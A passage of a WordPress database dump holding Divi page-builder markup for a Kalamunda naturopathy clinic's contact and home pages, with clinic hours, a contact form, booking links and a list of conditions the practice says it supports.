%%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 9am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed: 9:30am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 11am-7pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking) & Mead Medical, Kalamunda (Tuesday mornings only) </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-10-02 10:53:07','2025-10-02 02:53:07','',26,'https://verdenaturopathy.com.au/?p=495',0,'revision','',0),(497,1,'2025-10-20 14:16:54','2025-10-20 06:16:54','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" hover_enabled=\"0\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">the healing power of nature</span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">treat the person as a whole</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n<li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n<li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n<li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n<li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n<li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n<li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n<li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n<li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n<li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></p>\n<p><span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-10-20 14:16:54','2025-10-20 06:16:54','',28,'https://verdenaturopathy.com.au/?p=497',0,'revision','',0),(498,1,'2025-10-20 14:18:44','2025-10-20 06:18:44','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" hover_enabled=\"0\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Let\'s connect.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 9am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed: 9:30am-4pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 11am-7pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking) & Mead Medical, Kalamunda (Tuesday mornings only) </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" 